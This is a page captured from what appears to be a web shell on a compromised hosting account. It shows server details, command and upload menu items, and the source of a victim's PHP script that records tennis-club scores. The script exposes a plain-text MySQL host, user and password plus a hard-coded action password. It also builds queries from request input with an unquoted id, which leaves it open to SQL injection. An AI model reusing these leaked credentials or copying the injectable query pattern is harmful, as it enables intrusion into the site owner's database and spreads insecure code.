Server IP : 10.111.20.6  /  Your IP : 216.73.217.80
Web Server : Apache
System : Linux webm006.cluster111.gra.hosting.ovh.net 5.15.206-ovh-vps-grsec-zfs-classid #1 SMP Fri May 15 02:41:25 UTC 2026 x86_64
User : edizioni ( 7252)
PHP Version : 8.3.23
Disable Function : _dyuweyrj4,_dyuweyrj4r,dl
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON
Directory (0705) :  /home/edizioni/stampaeweb/../extonymask/

[  Home  ][  C0mmand  ][  Upload File  ]

Current File : /home/edizioni/stampaeweb/../extonymask/salvapunti.php
<?php
    $id1 = addslashes($_REQUEST['txt_giocatori']);
    $punti= addslashes($_REQUEST['txt_punti']);
    $parola = addslashes($_REQUEST['txt_parola']);
        include_once('mysql-fix.php');
        require_once("support/funformat.php");
         include('funzioni.php');
         $dbhost1 = "edizionitonym4sk.mysql.db"; $dbname1 = "edizionitonym4sk"; $dbuser1 = "edizionitonym4sk";    $dbpass1 = "Didier0533";
         $conn1 = mysql_connect($dbhost1,$dbuser1,$dbpass1)
               or die("Impossibile collegarsi al server MySQL.");
         mysql_select_db($dbname1,$conn1)
               or die("Impossibile selezionare il database $dbname");
            $sql1 = "SELECT * FROM circolo WHERE id=$id1";
            $result1 = mysql_query($sql1,$conn1);
            $riga1=mysql_fetch_array($result1);
            $recordset1[0]=$riga1;
            $vecchi1 =$recordset1[0]['punti'];
            $partite1 =$recordset1[0]['partite'];
            $attuale1 =$recordset1[0]['attuale'];

            $totale = $vecchi1 + $punti;
            $partite1++;

            $sql = "UPDATE `circolo` SET `punti` = '$totale', `partite` = '$partite1' WHERE `circolo`.`id` = $id1;";
            $sqltempo="UPDATE `000_agg_tennis` SET `damo` = now() WHERE `000_agg_tennis`.`id` = 1";
            if ($parola=="2369"){
                $e = esegui_query($sql); $f = esegui_query($sqltempo);
                      echo "Punti precedenti: $vecchi1";
                      echo "<br>Punti aggiunti: $punti";
                      echo "<br>Punti Totali: $totale";
            }else{
                echo "<h1 style=\"text-align:center\">AH AH AH, MA SE NON SAI LA PASSWORD COSA VUOI DA ME</h1>";
            }
?>

<p style="margin:1%"><a href="circolo.php" target="_SELF"><b class="btn btn-info btn-sm">Classifica</b></a>&nbsp;&nbsp;&nbsp;<a href="aggiornapunti.php" target="_SELF"><b class="btn btn-success btn-sm">Agg. Punti da Torneo</b></a>&nbsp;&nbsp;&nbsp;
</p>